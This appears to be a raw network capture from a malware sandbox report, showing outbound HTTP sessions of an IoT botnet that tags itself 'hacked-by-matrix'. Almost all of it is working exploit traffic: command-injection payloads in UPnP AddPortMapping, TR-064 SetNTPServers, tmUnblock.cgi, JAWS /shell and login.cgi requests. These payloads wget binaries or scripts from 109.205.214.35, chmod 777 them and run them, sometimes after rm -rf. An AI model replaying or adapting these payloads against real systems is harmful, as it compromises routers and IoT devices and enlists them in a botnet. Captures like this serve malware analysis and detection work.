                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        832192.168.2.1339556172.65.42.14652869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.943375111 CET987OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        833192.168.2.1360744172.87.206.2318080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.951638937 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        834192.168.2.135654499.246.84.2367547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.978089094 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        835192.168.2.133413467.7.83.117547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.979315042 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        836192.168.2.133842624.217.75.747547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.995424032 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        837192.168.2.133806475.84.243.1047547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.023372889 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        838192.168.2.1345336172.65.129.808080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.043400049 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        839192.168.2.1359222146.148.159.11880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.043416977 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:00.844252110 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:01.804229975 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:03.693459034 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:07.692229986 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:15.375418901 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:30.476232052 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        840192.168.2.135251646.17.4.9080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.063360929 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:00.226871014 CET406INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:00 GMT
                                                        Server: Apache/2
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        841192.168.2.1350654176.214.117.1647547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.067385912 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:00.287111998 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 07:22:59 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        842192.168.2.135719423.57.46.9680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.083559990 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:00.432312965 CET430INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 208
                                                        Expires: Thu, 21 Mar 2024 04:23:00 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:00 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 34 30 31 63 30 34 35 26 23 34 36 3b 31 37 31 30 39 39 34 39 38 30 26 23 34 36 3b 34 39 35 66 65 30 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;7401c045&#46;1710994980&#46;495fe0c</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        843192.168.2.133416267.7.83.117547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.105653048 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        844192.168.2.1338084109.36.131.6252869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.125852108 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:00.716242075 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
